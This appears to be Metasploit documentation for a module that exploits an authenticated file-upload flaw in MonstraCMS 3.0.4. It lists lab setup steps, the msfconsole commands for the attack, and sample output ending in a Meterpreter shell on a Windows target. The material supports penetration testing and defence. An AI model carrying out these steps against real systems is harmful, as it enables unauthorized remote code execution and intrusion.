## Description
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.
This module was tested against MonstraCMS 3.0.4.
Additional information and vulnerabilities can be viewed on Exploit-DB [43348](https://www.exploit-db.com/exploits/43348/).

## Verification Steps
Available at [Exploit-DB](https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip)

### Vulnerable Application Installation Setup
 1. Download Application : `https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 2. Extract : `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
 3. Move In WebDirectory : `C:\xampp\htdocs\`
 4. Now Visit : http://localhost/

## Verification Steps

 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/multi/http/monstra_fileupload_exec`
 4. Do: `set rport <port>`
 5. Do: `set rhost <ip>`
 6. Do: `set targeturi monstra`
 7. Do: `set username USERNAME`
 8. Do: `set password PASSWORD`
 9. Do: `check`
```
[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
```
 10. Do: `set lport <port>`
 11. Do: `set lhost <ip>`
 12. Do: `exploit`
 13. You should get a shell.


## Scenarios
### Monstra CMS on Windows Target
```                                                                                                                                    
msf exploit(multi/http/monstra_fileupload_exec) > check 

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit 

[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload 
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP

meterpreter > sysinfo 
Computer    : 114619-T470P
OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > 
```
